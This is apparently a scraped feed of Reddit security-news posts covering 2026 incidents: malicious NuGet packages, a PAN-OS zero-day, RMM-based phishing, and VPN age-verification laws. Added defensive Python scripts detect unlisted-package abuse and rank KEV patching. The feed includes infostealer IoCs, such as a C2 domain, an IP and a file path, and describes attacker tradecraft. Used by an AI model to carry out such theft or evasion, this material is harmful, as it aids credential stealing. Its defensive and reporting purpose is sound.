The campaign is particularly interesting because attackers are abusing legitimate AI collaboration infrastructure rather than relying solely on fake phishing domains.

This creates a stronger illusion of legitimacy since victims remain on trusted platforms while receiving malicious instructions.

Questions for community:
Could AI collaboration platforms become one of the next major social engineering attack surfaces for malware distribution?

Full Article: https://www.technadu.com/google-ads-and-claude-ai-shared-chats-abused-to-distribute-mac-malware/627723/

u/technadu — 11 days ago
▲ 16 r/pwnhub

This week’s cybersecurity news showed how attackers are increasingly abusing credentials, trust, and critical infrastructure

Some of the biggest stories this week included:

  • Active exploitation of a cPanel flaw exposing 550,000+ servers
  • PCPJack cloud worm harvesting Kubernetes, API, and SSH credentials
  • Taiwan rail disruption caused by a TETRA radio exploit
  • DNSSEC failure briefly taking millions of German websites offline
  • AI-driven cyberwarfare warnings from the Armis 2026 report
  • Insider-risk concerns around employees selling corporate logins
  • Water treatment systems in Poland reportedly breached
  • Canvas login-page defacements tied to ShinyHunters activity

One major trend stands out: attackers are increasingly focusing on identities, credentials, insider access, and trusted infrastructure rather than only traditional endpoint malware.

The cloud ecosystem, AI-driven attacks, supply chains, and human trust all continue expanding the attack surface simultaneously.

Question for community:
Which issue worries you most right now:

  • AI-powered attacks
  • Insider threats
  • Critical infrastructure targeting
  • Cloud credential theft
  • Supply chain compromise
  • Something else entirely?

Full Article: https://www.technadu.com/credentials-classrooms-and-confidence-cracked-this-week/627653/

u/technadu — 13 days ago
▲ 5 r/pwnhub

Supply Chain Risk: Trellix Confirms Source Code Repository Breach; RansomHouse Claims Responsibility

Trellix (the entity formed by the McAfee/FireEye merger) has officially confirmed unauthorized access to a portion of its internal source code repository. While the company maintains that its build and distribution pipelines remain secure, the involvement of RansomHouse adds a significant extortion layer to the incident.

Technical Breakdown:

  • Incident Window: Trellix identified the breach in early May 2026, though RansomHouse claims the initial compromise occurred on April 17, 2026.
  • The "Map" Risk: The primary concern for the security community isn't just the code itself, but the detection logic. Access to source code allows threat actors to reverse-engineer how EDR/NDR products "see" threats, enabling the development of highly effective evasion techniques.
  • Scope: Trellix states there is currently no evidence that the accessed code is being exploited or that signing keys/build paths were compromised. However, they have engaged external forensics to verify the full extent of the lateral movement.

Impact for Blue Teams: If you rely on Trellix for enterprise defense, this is a "watch cadence" event. While no patches are required yet, the exposure of proprietary logic increases the risk of downstream "blind spots" in the coming months.

Full Report and Forensic Timeline: https://www.technadu.com/trellix-source-code-repository-breach-claimed-by-ransomhouse/627536/

u/technadu — 14 days ago
▲ 5 r/pwnhub

A new supply chain campaign is currently targeting developers within the .NET ecosystem, specifically those using Chinese-language enterprise libraries. Researchers at Socket discovered five malicious packages (impersonating AntdUI) that have already racked up 65,000 downloads.

The Tactic: Reputation & Stealth

The threat actor, bmrxntfj, used a clever trick to hide the payload: of the 224 versions published, 219 were set to "listed: false." This allowed the malicious code to sit on the NuGet registry without appearing in standard search results, while still being fetchable by CI/CD pipelines or automated build tools.

The Payload: The packages deploy a sophisticated infostealer protected by .NET Reactor. It doesn't just go after browsers; it specifically targets:

  • Infrastructure Assets: SSH private keys, Outlook profiles, and Steam sessions.
  • Dev Environments: Local files in Desktop, Documents, and Downloads.
  • Crypto: 12 different browsers and 8 desktop wallets.

IoCs for your Detection Stack: If you're running a .NET shop, audit your build servers for these markers:

  • C2 Domain: dns-providersa2[.]com (Registered March 2026)
  • IP Address: 62[.]84[.]102[.]85
  • File Alert: Monitor for any creation of C:\ProgramData\Microsoft OneDrive\keys.dat (Legitimate OneDrive never uses this).
  • Process Alert: Look for CoCreateInstance calls requesting the Edge IElevator interface outside of the Edge browser family.

Affected Packages: IR.DantUI, IR.Infrastructure.Core, IR.Infrastructure.DataService.Core, IR.iplus32, and IR.OscarUI.

Full technical analysis and hash list: https://www.technadu.com/malicious-nuget-packages-target-chinese-net-ecosystem-developers/627373/
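Added example (mine, not from the post or Socket): the "219 of 224 versions unlisted" trick is visible in NuGet's public registration metadata, where every version carries a listed flag, so the ratio is cheap to compute for any package your builds pull. The script below reads a registration index, reports the unlisted fraction, and separately checks a .csproj for PackageReference entries that match the five IDs from the post (NuGet IDs are case-insensitive, so the match is too). The registration excerpt is constructed, with invented versions and dates, not the real package history; the csproj is constructed; the thresholds are assumptions.

```python
import json
import xml.etree.ElementTree as ET

# Package IDs named in the Socket report.
AFFECTED = {"IR.DantUI", "IR.Infrastructure.Core", "IR.Infrastructure.DataService.Core",
            "IR.iplus32", "IR.OscarUI"}
AFFECTED_LOWER = {p.lower(): p for p in AFFECTED}

# Constructed excerpt in the shape of a NuGet v3 registration index
# (https://api.nuget.org/v3/registration5-semver1/<id-lowercase>/index.json).
# Versions and dates are invented for the example; 1 listed, 11 unlisted.
SAMPLE_REGISTRATION = json.dumps({
    "count": 1,
    "items": [{
        "count": 12,
        "items": [
            {"catalogEntry": {"id": "IR.DantUI", "version": f"1.0.{i}", "listed": i == 0,
                              "published": f"2026-03-{2 + i:02d}T00:00:00Z"}}
            for i in range(12)
        ],
    }],
})

# Constructed SDK-style project file.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="ir.dantui" Version="1.0.4" />
  </ItemGroup>
</Project>"""


def unlisted_profile(registration_json):
    """Return (total_versions, unlisted_versions, unlisted_fraction) for a registration index.

    Note: on large packages the index pages may omit inline "items" and only give a page
    "@id" to fetch; this offline version assumes the entries are inlined.
    """
    reg = json.loads(registration_json)
    entries = [leaf["catalogEntry"] for page in reg["items"] for leaf in page.get("items", [])]
    total = len(entries)
    unlisted = sum(1 for e in entries if not e.get("listed", True))
    return total, unlisted, (unlisted / total if total else 0.0)


def is_suspicious_profile(registration_json, min_versions=10, max_unlisted_fraction=0.8):
    """A package with many versions, almost all hidden from search, is worth a manual look."""
    total, _, fraction = unlisted_profile(registration_json)
    return total >= min_versions and fraction >= max_unlisted_fraction


def affected_references(csproj_xml):
    """Canonical IDs of affected packages referenced (Include or Update) in a .csproj."""
    root = ET.fromstring(csproj_xml)
    hits = set()
    for ref in root.iter("PackageReference"):
        pid = (ref.get("Include") or ref.get("Update") or "").lower()
        if pid in AFFECTED_LOWER:
            hits.add(AFFECTED_LOWER[pid])
    return hits


if __name__ == "__main__":
    total, unlisted, frac = unlisted_profile(SAMPLE_REGISTRATION)
    print(f"IR.DantUI: {unlisted}/{total} versions unlisted ({frac:.0%}) ->",
          "suspicious" if is_suspicious_profile(SAMPLE_REGISTRATION) else "ok")
    print("affected references:", affected_references(SAMPLE_CSPROJ))
```

Unlisting is a legitimate feature (maintainers hide broken releases), so the ratio is a triage signal: a package with a dozen or more versions where over 80 percent are hidden is unusual and pairs naturally with the post's host IoCs (the keys.dat path under ProgramData and the out-of-process IElevator call) for the endpoint side of the hunt.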

u/technadu — 15 days ago
▲ 16 r/pwnhub

Palo Alto Networks has confirmed active exploitation of a critical zero-day (CVE-2026-0300) affecting the User-ID Authentication Portal (Captive Portal) in PAN-OS.

The Vulnerability: This is a classic buffer overflow triggered by specially crafted packets sent to the portal. Because the Captive Portal service often sits on the edge, this allows an unauthenticated attacker to execute arbitrary code with root privileges on PA-Series and VM-Series firewalls.

Exploitation Status: Palo Alto is reporting "limited exploitation" in the wild, specifically targeting portals exposed to the public internet. If your management or captive portal is WAN-facing, you are currently at high risk.

Patch Schedule:

  • Round 1: Targeted for May 13th.
  • Round 2: Targeted for May 28th.
  • Note: Prisma Access and Cloud NGFW are reportedly not affected.

Immediate Mitigation: Until May 13th, the only reliable defense is to disable the User-ID Authentication Portal on all untrusted interfaces or restrict access to specific, trusted internal IP ranges.

Full Technical Analysis & Affected Versions: ⬇️
https://www.technadu.com/palo-alto-networks-to-patch-exploited-pan-os-zero-day-cve-2026-0300-starting-may-13/627358/

u/technadu — 16 days ago
▲ 52 r/VPN

The UK’s "Children’s Wellbeing and Schools Act 2026" has officially moved forward, and it contains a specific provision that could change the VPN landscape in Europe. For the first time, the government is looking to close the "loophole" where minors use VPNs to bypass the Online Safety Act's age checks.

Key Provisions in the Act:

  • Mandatory Age Assurance: VPN providers may be required to implement "highly effective" age verification for UK-based users.
  • The 12-Month Clock: The Secretary of State now has a mandate to lay regulations within 12 months to prohibit "relevant VPN services" from being provided to children under 18.
  • Ofcom Oversight: Ofcom will likely be the body issuing guidance on how VPNs must comply, including potential blacklisting for non-compliant services.

The Privacy Conflict:

Digital rights groups are warning that this is a "second-order censorship" move. If VPNs are forced to verify age, they must collect user ID data, which fundamentally breaks the "No-Logs" promise and privacy-first nature of these tools.

Official Source & Impact Analysis:

You can track the bill's progress on the UK Parliament site https://www.gov.uk/government/news/landmark-consultation-seeks-views-on-major-measures-to-protect-children-on-social-media-gaming-platforms-and-ai-chatbots

I've put together a full breakdown of the specific amendments (including the January House of Lords vote) and what this means for the future of "private" browsing in the UK:

https://www.technadu.com/uk-vpn-ban-for-children-proposal-raises-safety-questions/627344/

u/technadu — 16 days ago
▲ 5 r/pwnhub

A sophisticated phishing campaign, dubbed VENOMOUS#HELPER, has successfully breached over 80 US-based organizations since early 2025. This isn't your standard "click-and-steal" credential harvest; it’s a high-level Initial Access Broker (IAB) play using legitimate software to stay invisible.

The Persistence Playbook: The attackers aren't using custom malware that triggers EDR. Instead, they are deploying a Dual-Channel RMM architecture:

  • Primary: A self-hosted, cracked build of SimpleHelp 5.0.1 (packaged via JWrapper).
  • Secondary: A ConnectWise ScreenConnect relay.

By deploying two independent, legitimate RMM tools simultaneously, they ensure that even if IT detects and removes one, the second channel remains active.

Stealth Mechanics: The operators are reportedly monitoring the victim’s idle state. They only activate the remote session when the cursor has been static for an extended period (indicating the user is away from the desk), making it extremely difficult for an employee to "catch" the remote access in real-time.

Attack Chain:

  1. Lure: High-pressure Social Security Administration (SSA) themed emails.
  2. Redirect: Users are sent to compromised Mexican business sites (acting as proxies).
  3. Payload: A JWrapper executable that installs the silent RMM tools.

Why this matters: This activity is consistent with a ransomware precursor. If you’re seeing unauthorized SimpleHelp or ScreenConnect traffic on port 8041, you likely have an IAB already sitting on the network.

Full Technical Breakdown and IoCs: https://www.technadu.com/phishing-campaign-impersonating-the-u-s-social-security-administration-targets-80-organizations/627279/

u/technadu — 17 days ago
▲ 31 r/VPN

We’ve been tracking the new age-verification laws, and Utah just set a really weird precedent that might affect VPN users nationwide. Starting May 6th, SB 73 officially takes aim at using VPNs to bypass state blocks.

The three biggest concerns for this community:

  1. "Physical Location" over IP: The law says if you are physically in Utah, you are legally under Utah jurisdiction even if your VPN IP says you're in Switzerland.
  2. The Gag Order: Websites are now legally banned from even suggesting or showing users how to use a VPN to get around these checks.
  3. The "Nuclear Option": Because sites can't easily "prove" where a VPN user is, experts (like the EFF) are worried sites will just start blocking all known VPN IP ranges entirely to avoid lawsuits.

This seems like a massive technical mess. How are these sites even supposed to "verify" a masked user without a total VPN ban? Curious if anyone here in Utah is already seeing blocks.

Full Article: https://www.eff.org/deeplinks/2026/04/utahs-new-law-regulating-vpns-goes-effect-next-week

u/technadu — 18 days ago
▲ 8 r/pwnhub

CISA just added CVE-2026-31431 to its Known Exploited Vulnerabilities catalog, confirming that attackers are already using it in the wild.

This one hits the Linux kernel, which makes it especially interesting given how widely it’s used across servers, cloud, and containers.

A few points worth discussing:

  • KEV inclusion = confirmed exploitation, not theoretical risk
  • Kernel-level bugs can have widespread impact
  • Patch timelines often lag behind disclosure in real-world environments

Curious what others think:
  • How do you prioritize KEV vulnerabilities in your workflow?
  • Are patch SLAs realistic for critical infra?
  • Do orgs rely too heavily on delayed patch cycles?

Would love to hear real-world perspectives.

Source: https://www.cisa.gov/news-events/alerts/2026/05/01/cisa-adds-one-known-exploited-vulnerability-catalog
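Added example (mine, not from the post or CISA) for the "how do you prioritize KEV" question: the catalog is published as JSON with a dueDate per entry, so the simplest defensible queue is "KEV entries on my assets, earliest due date first, internet-facing and ransomware-linked ties broken upward". The block joins a KEV excerpt with a scanner-style asset inventory and produces that queue plus the overdue list. The KEV excerpt is constructed in the feed's shape: CVE-2026-31431 is the entry the post is about but its dueDate here is a placeholder, CVE-2026-99999 and CVE-2025-12345 are made-up IDs, and the inventory is invented. The live feed URL in the comment is the real one; the fetch is left out so this runs offline.

```python
import json
from datetime import date

# Constructed excerpt in the shape of the CISA KEV feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# Dates are placeholders; take the real dueDate from the live catalog.
SAMPLE_KEV = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2026.05.01",
    "vulnerabilities": [
        {"cveID": "CVE-2026-31431", "vendorProject": "Linux", "product": "Kernel",
         "dateAdded": "2026-05-01", "dueDate": "2026-05-22",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-99999", "vendorProject": "ExampleVendor", "product": "ExampleApp",
         "dateAdded": "2026-04-20", "dueDate": "2026-05-11",
         "knownRansomwareCampaignUse": "Known"},
    ],
})

# Constructed asset inventory, the kind of thing a vuln scanner export gives you.
SAMPLE_INVENTORY = [
    {"host": "k8s-node-03", "exposure": "internal", "cves": ["CVE-2026-31431", "CVE-2025-12345"]},
    {"host": "edge-proxy-01", "exposure": "internet", "cves": ["CVE-2026-31431"]},
    {"host": "hr-app-02", "exposure": "internet", "cves": ["CVE-2026-99999"]},
    {"host": "build-07", "exposure": "internal", "cves": ["CVE-2025-12345"]},
]


def load_kev(kev_json):
    """Index the catalog by CVE ID."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def prioritize(kev_json, inventory, today):
    """Return the KEV-listed (host, CVE) pairs as a work queue.

    Ordering: fewest days to CISA's dueDate first, then internet-facing before internal,
    then known-ransomware before unknown, then hostname for a stable order. Anything not in
    KEV is left to the regular patch cycle rather than this queue.
    """
    kev = load_kev(kev_json)
    rows = []
    for asset in inventory:
        for cve in asset["cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            rows.append({
                "host": asset["host"],
                "cve": cve,
                "product": f"{entry['vendorProject']} {entry['product']}",
                "due": due.isoformat(),
                "days_left": (due - today).days,
                "internet_facing": asset["exposure"] == "internet",
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    rows.sort(key=lambda r: (r["days_left"], not r["internet_facing"], not r["ransomware"], r["host"]))
    return rows


def overdue(rows):
    """Rows already past their dueDate (negative days_left)."""
    return [r for r in rows if r["days_left"] < 0]


if __name__ == "__main__":
    queue = prioritize(SAMPLE_KEV, SAMPLE_INVENTORY, today=date(2026, 5, 15))
    for r in queue:
        flag = "OVERDUE" if r["days_left"] < 0 else f"{r['days_left']}d left"
        print(f"{flag:>9}  {r['host']:<14} {r['cve']}  {r['product']}"
              f"{'  internet' if r['internet_facing'] else ''}")
```

With today set to 2026-05-15 the queue comes out as hr-app-02 (overdue), then the two kernel hosts with the internet-facing proxy ahead of the internal node. The KEV dueDate is the federal civilian deadline, not a universal SLA; the point of the sort is that "in KEV" moves an item out of the monthly cycle and into a dated queue, which is the practical answer to the post's first question.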

u/technadu — 20 days ago